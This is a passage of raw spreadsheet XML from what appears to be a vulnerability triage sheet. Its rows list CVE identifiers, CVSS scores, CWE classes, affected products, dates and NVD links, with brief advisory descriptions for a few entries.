t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1430" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1430" s="5" t="inlineStr" /><c r="R1430" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75722</t></is></c></row><row r="1431"><c r="A1431" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1431" s="5" t="inlineStr"><is><t>CVE-2026-75724</t></is></c><c r="D1431" s="5" t="n"><v>5.4</v></c><c r="E1431" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1431" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1431" s="5" t="inlineStr" /><c r="H1431" s="5" t="n"><v>0.003</v></c><c r="I1431" s="5" t="inlineStr" /><c r="J1431" s="5" t="inlineStr" /><c r="K1431" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1431" s="5" t="inlineStr" /><c r="M1431" s="5" t="inlineStr" /><c r="N1431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1431" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1431" s="5" t="inlineStr" /><c r="R1431" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75724</t></is></c></row><row r="1432"><c r="A1432" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1432" s="5" t="inlineStr"><is><t>CVE-2026-75725</t></is></c><c r="D1432" s="5" t="n"><v>5.4</v></c><c r="E1432" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1432" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1432" s="5" t="inlineStr" /><c r="H1432" s="5" t="n"><v>0.003</v></c><c r="I1432" s="5" t="inlineStr" /><c r="J1432" s="5" t="inlineStr" /><c r="K1432" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1432" s="5" t="inlineStr" /><c r="M1432" s="5" t="inlineStr" /><c r="N1432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1432" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1432" s="5" t="inlineStr" /><c r="R1432" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75725</t></is></c></row><row r="1433"><c r="A1433" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1433" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1433" s="5" t="inlineStr"><is><t>CVE-2026-75727</t></is></c><c r="D1433" s="5" t="n"><v>5.4</v></c><c r="E1433" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1433" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1433" s="5" t="inlineStr" /><c r="H1433" s="5" t="n"><v>0.003</v></c><c r="I1433" s="5" t="inlineStr" /><c r="J1433" s="5" t="inlineStr" /><c r="K1433" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1433" s="5" t="inlineStr" /><c r="M1433" s="5" t="inlineStr" /><c r="N1433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1433" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1433" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1433" s="5" t="inlineStr" /><c r="R1433" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75727</t></is></c></row><row r="1434"><c r="A1434" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1434" s="5" t="inlineStr"><is><t>CVE-2026-75729</t></is></c><c r="D1434" s="5" t="n"><v>5.4</v></c><c r="E1434" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1434" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1434" s="5" t="inlineStr" /><c r="H1434" s="5" t="n"><v>0.003</v></c><c r="I1434" s="5" t="inlineStr" /><c r="J1434" s="5" t="inlineStr" /><c r="K1434" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1434" s="5" t="inlineStr" /><c r="M1434" s="5" t="inlineStr" /><c r="N1434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1434" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1434" s="5" t="inlineStr" /><c r="R1434" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75729</t></is></c></row><row r="1435"><c r="A1435" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1435" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1435" s="5" t="inlineStr"><is><t>CVE-2026-75730</t></is></c><c r="D1435" s="5" t="n"><v>5.4</v></c><c r="E1435" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1435" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1435" s="5" t="inlineStr" /><c r="H1435" s="5" t="n"><v>0.003</v></c><c r="I1435" s="5" t="inlineStr" /><c r="J1435" s="5" t="inlineStr" /><c r="K1435" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1435" s="5" t="inlineStr" /><c r="M1435" s="5" t="inlineStr" /><c r="N1435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1435" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1435" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1435" s="5" t="inlineStr" /><c r="R1435" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75730</t></is></c></row><row r="1436"><c r="A1436" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1436" s="5" t="inlineStr"><is><t>CVE-2026-75731</t></is></c><c r="D1436" s="5" t="n"><v>5.4</v></c><c r="E1436" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1436" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1436" s="5" t="inlineStr" /><c r="H1436" s="5" t="n"><v>0.003</v></c><c r="I1436" s="5" t="inlineStr" /><c r="J1436" s="5" t="inlineStr" /><c r="K1436" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1436" s="5" t="inlineStr" /><c r="M1436" s="5" t="inlineStr" /><c r="N1436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1436" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1436" s="5" t="inlineStr" /><c r="R1436" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75731</t></is></c></row><row r="1437"><c r="A1437" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1437" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1437" s="5" t="inlineStr"><is><t>CVE-2026-75733</t></is></c><c r="D1437" s="5" t="n"><v>5.4</v></c><c r="E1437" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1437" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1437" s="5" t="inlineStr" /><c r="H1437" s="5" t="n"><v>0.003</v></c><c r="I1437" s="5" t="inlineStr" /><c r="J1437" s="5" t="inlineStr" /><c r="K1437" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1437" s="5" t="inlineStr" /><c r="M1437" s="5" t="inlineStr" /><c r="N1437" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1437" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1437" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1437" s="5" t="inlineStr" /><c r="R1437" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75733</t></is></c></row><row r="1438"><c r="A1438" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1438" s="5" t="inlineStr"><is><t>CVE-2026-75734</t></is></c><c r="D1438" s="5" t="n"><v>5.4</v></c><c r="E1438" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1438" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1438" s="5" t="inlineStr" /><c r="H1438" s="5" t="n"><v>0.003</v></c><c r="I1438" s="5" t="inlineStr" /><c r="J1438" s="5" t="inlineStr" /><c r="K1438" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1438" s="5" t="inlineStr" /><c r="M1438" s="5" t="inlineStr" /><c r="N1438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1438" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1438" s="5" t="inlineStr" /><c r="R1438" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75734</t></is></c></row><row r="1439"><c r="A1439" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1439" s="5" t="inlineStr"><is><t>CVE-2026-75735</t></is></c><c r="D1439" s="5" t="n"><v>5.4</v></c><c r="E1439" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1439" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1439" s="5" t="inlineStr" /><c r="H1439" s="5" t="n"><v>0.003</v></c><c r="I1439" s="5" t="inlineStr" /><c r="J1439" s="5" t="inlineStr" /><c r="K1439" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1439" s="5" t="inlineStr" /><c r="M1439" s="5" t="inlineStr" /><c r="N1439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1439" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1439" s="5" t="inlineStr" /><c r="R1439" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75735</t></is></c></row><row r="1440"><c r="A1440" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1440" s="5" t="inlineStr"><is><t>CVE-2026-75736</t></is></c><c r="D1440" s="5" t="n"><v>5.4</v></c><c r="E1440" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1440" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1440" s="5" t="inlineStr" /><c r="H1440" s="5" t="n"><v>0.003</v></c><c r="I1440" s="5" t="inlineStr" /><c r="J1440" s="5" t="inlineStr" /><c r="K1440" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1440" s="5" t="inlineStr" /><c r="M1440" s="5" t="inlineStr" /><c r="N1440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1440" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1440" s="5" t="inlineStr" /><c r="R1440" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75736</t></is></c></row><row r="1441"><c r="A1441" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1441" s="5" t="inlineStr"><is><t>CVE-2026-75737</t></is></c><c r="D1441" s="5" t="n"><v>5.4</v></c><c r="E1441" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1441" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1441" s="5" t="inlineStr" /><c r="H1441" s="5" t="n"><v>0.003</v></c><c r="I1441" s="5" t="inlineStr" /><c r="J1441" s="5" t="inlineStr" /><c r="K1441" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1441" s="5" t="inlineStr" /><c r="M1441" s="5" t="inlineStr" /><c r="N1441" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1441" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1441" s="5" t="inlineStr" /><c r="R1441" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75737</t></is></c></row><row r="1442"><c r="A1442" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1442" s="5" t="inlineStr"><is><t>CVE-2026-75738</t></is></c><c r="D1442" s="5" t="n"><v>5.4</v></c><c r="E1442" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1442" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1442" s="5" t="inlineStr" /><c r="H1442" s="5" t="n"><v>0.003</v></c><c r="I1442" s="5" t="inlineStr" /><c r="J1442" s="5" t="inlineStr" /><c r="K1442" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1442" s="5" t="inlineStr" /><c r="M1442" s="5" t="inlineStr" /><c r="N1442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1442" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1442" s="5" t="inlineStr" /><c r="R1442" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75738</t></is></c></row><row r="1443"><c r="A1443" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1443" s="5" t="inlineStr"><is><t>CVE-2026-75739</t></is></c><c r="D1443" s="5" t="n"><v>5.4</v></c><c r="E1443" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1443" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1443" s="5" t="inlineStr" /><c r="H1443" s="5" t="n"><v>0.003</v></c><c r="I1443" s="5" t="inlineStr" /><c r="J1443" s="5" t="inlineStr" /><c r="K1443" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1443" s="5" t="inlineStr" /><c r="M1443" s="5" t="inlineStr" /><c r="N1443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1443" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1443" s="5" t="inlineStr" /><c r="R1443" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75739</t></is></c></row><row r="1444"><c r="A1444" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1444" s="5" t="inlineStr"><is><t>CVE-2026-75740</t></is></c><c r="D1444" s="5" t="n"><v>5.4</v></c><c r="E1444" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1444" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1444" s="5" t="inlineStr" /><c r="H1444" s="5" t="n"><v>0.003</v></c><c r="I1444" s="5" t="inlineStr" /><c r="J1444" s="5" t="inlineStr" /><c r="K1444" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1444" s="5" t="inlineStr" /><c r="M1444" s="5" t="inlineStr" /><c r="N1444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1444" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1444" s="5" t="inlineStr" /><c r="R1444" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75740</t></is></c></row><row r="1445"><c r="A1445" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1445" s="5" t="inlineStr"><is><t>CVE-2026-75741</t></is></c><c r="D1445" s="5" t="n"><v>5.4</v></c><c r="E1445" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1445" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1445" s="5" t="inlineStr" /><c r="H1445" s="5" t="n"><v>0.003</v></c><c r="I1445" s="5" t="inlineStr" /><c r="J1445" s="5" t="inlineStr" /><c r="K1445" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1445" s="5" t="inlineStr" /><c r="M1445" s="5" t="inlineStr" /><c r="N1445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1445" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1445" s="5" t="inlineStr" /><c r="R1445" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75741</t></is></c></row><row r="1446"><c r="A1446" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1446" s="5" t="inlineStr"><is><t>CVE-2026-75742</t></is></c><c r="D1446" s="5" t="n"><v>5.4</v></c><c r="E1446" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1446" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1446" s="5" t="inlineStr" /><c r="H1446" s="5" t="n"><v>0.003</v></c><c r="I1446" s="5" t="inlineStr" /><c r="J1446" s="5" t="inlineStr" /><c r="K1446" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1446" s="5" t="inlineStr" /><c r="M1446" s="5" t="inlineStr" /><c r="N1446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1446" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1446" s="5" t="inlineStr" /><c r="R1446" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75742</t></is></c></row><row r="1447"><c r="A1447" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1447" s="5" t="inlineStr"><is><t>CVE-2026-79905</t></is></c><c r="D1447" s="5" t="n"><v>5.4</v></c><c r="E1447" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1447" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1447" s="5" t="inlineStr" /><c r="H1447" s="5" t="n"><v>0.003</v></c><c r="I1447" s="5" t="inlineStr" /><c r="J1447" s="5" t="inlineStr" /><c r="K1447" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1447" s="5" t="inlineStr" /><c r="M1447" s="5" t="inlineStr" /><c r="N1447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1447" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1447" s="5" t="inlineStr" /><c r="R1447" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79905</t></is></c></row><row r="1448"><c r="A1448" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1448" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1448" s="5" t="inlineStr"><is><t>CVE-2026-84385</t></is></c><c r="D1448" s="5" t="n"><v>5.4</v></c><c r="E1448" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1448" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1448" s="5" t="inlineStr" /><c r="H1448" s="5" t="n"><v>0.001</v></c><c r="I1448" s="5" t="inlineStr" /><c r="J1448" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1448" s="5" t="inlineStr" /><c r="L1448" s="5" t="inlineStr" /><c r="M1448" s="5" t="inlineStr" /><c r="N1448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1448" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1448" s="5" t="inlineStr" /><c r="R1448" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1448" s="5" t="inlineStr"><is><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is></c><c r="T1448" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t></is></c></row><row r="1449"><c r="A1449" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1449" s="5" t="inlineStr"><is><t>CVE-2026-86996</t></is></c><c r="D1449" s="5" t="n"><v>5.4</v></c><c r="E1449" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1449" s="5" t="inlineStr" /><c r="H1449" s="5" t="n"><v>0.002</v></c><c r="I1449" s="5" t="inlineStr" /><c r="J1449" s="5" t="inlineStr" /><c r="K1449" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1449" s="5" t="inlineStr"><is><t>npm:n8n</t></is></c><c r="M1449" s="5" t="inlineStr"><is><t>2.37.7, 2.38.2</t></is></c><c r="N1449" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O1449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1449" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1449" s="5" t="inlineStr" /><c r="R1449" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1449" s="5" t="inlineStr"><is><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is></c><c r="T1449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86996</t></is></c></row><row r="1450"><c r="A1450" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1450" s="5" t="inlineStr"><is><t>CVE-2026-12962</t></is></c><c r="D1450" s="5" t="n"><v>5.3</v></c><c r="E1450" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1450" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1450" s="5" t="inlineStr" /><c r="H1450" s="5" t="n"><v>0.004</v></c><c r="I1450" s="5" t="inlineStr" /><c r="J1450" s="5" t="inlineStr" /><c r="K1450" s="5" t="inlineStr" /><c r="L1450" s="5" t="inlineStr" /><c r="M1450" s="5" t="inlineStr" /><c r="N1450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1450" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1450" s="5" t="inlineStr" /><c r="R1450" s="5" t="inlineStr"><is><t>CWE-942</t></is></c><c r="S1450" s="5" t="inlineStr"><is><t>A Permissive Cross-domain Security Policy with Untrusted Domains in Armoury Crate allows a remote user to obtain a local user's NTLM hash by convincing the user to visit a crafted web page that sends a request containing a UNC path to the application's local service endpoint.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12962</t></is></c></row><row r="1451"><c r="A1451" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1451" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1451" s="5" t="inlineStr"><is><t>CVE-2026-19614</t></is></c><c r="D1451" s="5" t="n"><v>5.3</v></c><c r="E1451" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1451" s="5" t="inlineStr"><is><t>64c5ae8f-7972-4697-86a0-7ada793ac795</t></is></c><c r="G1451" s="5" t="inlineStr" /><c r="H1451" s="5" t="n"><v>0.002</v></c><c r="I1451" s="5" t="inlineStr" /><c r="J1451" s="5" t="inlineStr" /><c r="K1451" s="5" t="inlineStr" /><c r="L1451" s="5" t="inlineStr" /><c r="M1451" s="5" t="inlineStr" /><c r="N1451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1451" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1451" s="5" t="inlineStr" /><c r="R1451" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S1451" s="5" t="inlineStr"><is><t>The API is prone to XML external entity (XXE) injection. By default, XML external entity support is enabled.
This issue affects NanoXML: 2.2.3.</t></is></c><c r="T1451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19614</t></is></c></row><row r="1452"><c r="A1452" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1452" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1452" s="5" t="inlineStr"><is><t>CVE-2026-19625</t></is></c><c r="D1452" s="5" t="n"><v>5.3</v></c><c r="E1452" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1452" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1452" s="5" t="inlineStr" /><c r="H1452" s="5" t="n"><v>0.003</v></c><c r="I1452" s="5" t="inlineStr" /><c r="J1452" s="5" t="inlineStr" /><c r="K1452" s="5" t="inlineStr" /><c r="L1452" s="5" t="inlineStr" /><c r="M1452" s="5" t="inlineStr" /><c r="N1452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1452" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1452" s="5" t="inlineStr" /><c r="R1452" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1452" s="5" t="inlineStr"><is><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is></c><c r="T1452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19625</t></is></c></row><row r="1453"><c r="A1453" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1453" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1453" s="5" t="inlineStr"><is><t>CVE-2026-33389</t></is></c><c r="D1453" s="5" t="n"><v>5.3</v></c><c r="E1453" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1453" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1453" s="5" t="inlineStr" /><c r="H1453" s="5" t="n"><v>0.001</v></c><c r="I1453" s="5" t="inlineStr" /><c r="J1453" s="5" t="inlineStr" /><c r="K1453" s="5" t="inlineStr" /><c r="L1453" s="5" t="inlineStr" /><c r="M1453" s="5" t="inlineStr" /><c r="N1453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1453" s="5" t="inlineStr" /><c r="R1453" s="5" t="inlineStr"><is><t>CWE-671</t></is></c><c r="S1453" s="5" t="inlineStr"><is><t>An improper certificate/host key validation vulnerability was discovered in the Smart Polling functionality, which established encrypted connections to target devices without validating the remote host's identity, and no option was provided to enable it. A man-in-the-middle attacker positioned between a sensor and a polled device can, during a polling session, impersonate the device and intercept the communication, including the credentials used to access it. The captured credentials can then be replayed to authenticate against the device itself or against other devices sharing the same credentials, allowing the attacker to access and tamper with the device's data and to disrupt its operations.</t></is></c><c r="T1453" s="6" 